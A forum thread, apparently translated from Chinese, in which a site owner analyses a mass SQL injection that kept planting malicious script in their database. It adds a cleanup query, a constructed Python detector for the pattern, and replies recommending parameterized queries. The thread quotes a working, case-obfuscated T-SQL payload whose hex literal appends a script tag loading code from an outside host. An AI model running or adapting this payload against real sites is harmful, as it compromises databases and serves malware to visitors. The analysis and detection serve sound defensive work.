Found a snippet:
;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
Found an article: Recently my website kept getting injected with malicious script (挂马) and I didn't know why. I took the forum offline for a while and after that it stopped. On closer analysis it turned out the database itself was what kept getting injected. Like the Trend Micro injection incident mentioned before, this injection method has apparently been popular for a long time; it started on a large scale last year, and you can find many traces of it online. The SQL statement is as follows: it uses a cursor to iterate over every column of the following data types in every table and then UPDATEs them to append the malicious content (all of them are columns that accept character data):
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
——————— YD's divider ———————
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a, syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']= rtrim(convert(varchar,['+@C+']))+ ''挂马内容''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
select 'update ' + b.[name] + ' set ' + a.[name] + '=replace(' + a.[name] + ',''</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--'','''')' from syscolumns as a,sysobjects as b where a.[id]=b.[id] and b.xtype='U' and a.xtype in ('231','35','99','167','175') order by b.[name]
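An added example, not code from any post in this thread: a small Python detector for the mass-UPDATE payload pattern quoted above, meant to run over URL-decoded request parameters from web logs. It folds the mixed-case obfuscation, decodes the CAST(0x... AS VARCHAR) hex literal to recover the injected HTML and its external script URL, and also handles the plain-quoted variant from the article. The sample parameter and the example.invalid URL are constructed here, not taken from the page.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Tokens that together characterise the payload quoted in this thread: a cursor over
# sysobjects/syscolumns driving a dynamic UPDATE against every text-typed column.
SIGNATURE_TOKENS = ("declare", "cursor", "sysobjects", "syscolumns", "exec(", "update")
# CAST(0x... AS VARCHAR(n)) smuggles the HTML as a hex literal so no quote appears in the request.
HEX_CAST = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script[^>]*?\bsrc=['\"]?([^'\"\s>]+)", re.IGNORECASE)


@dataclass
class Finding:
    decoded_html: str          # HTML the UPDATE would append to each row ("" if not hex-encoded)
    script_src: Optional[str]  # external script URL to block and hunt for, if one is present


def inspect_parameter(param: str) -> Optional[Finding]:
    """Return a Finding if a URL-decoded parameter value matches the mass-UPDATE pattern."""
    folded = re.sub(r"\s+", " ", param).lower()   # defeats the mIxEd-CaSe obfuscation
    if not all(token in folded for token in SIGNATURE_TOKENS):
        return None
    m = HEX_CAST.search(param)
    decoded = bytes.fromhex(m.group(1)).decode("latin-1") if m else ""
    src = SCRIPT_SRC.search(decoded or param)      # plain-quoted variants carry the tag verbatim
    return Finding(decoded, src.group(1) if src else None)


def scan_params(params: dict) -> dict:
    """Run inspect_parameter over every request parameter; returns {name: Finding} for hits only."""
    hits = {name: inspect_parameter(value) for name, value in params.items()}
    return {name: f for name, f in hits.items() if f is not None}


# Constructed sample (not from the page): same mixed-case style, with a placeholder URL.
INJECTED_HTML = "</title><script src=http://example.invalid/1.js></script><!--"
SAMPLE_PARAM = (
    "1;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR "
    "sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD oPeN tAbLe_cursoR "
    "fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn "
    "exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x"
    + INJECTED_HTML.encode().hex().upper() + " aS vArChAr(" + str(len(INJECTED_HTML)) + "))') eNd;--"
)

if __name__ == "__main__":
    for name, finding in scan_params({"id": SAMPLE_PARAM, "page": "2"}).items():
        print(name, "->", finding.script_src)
```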
This is obviously a cross-site attack...
OP, remember to pass parameters with SqlParameter.
And filter out dangerous characters, things like <script>; just filter them without a second thought... or replace them with full-width characters.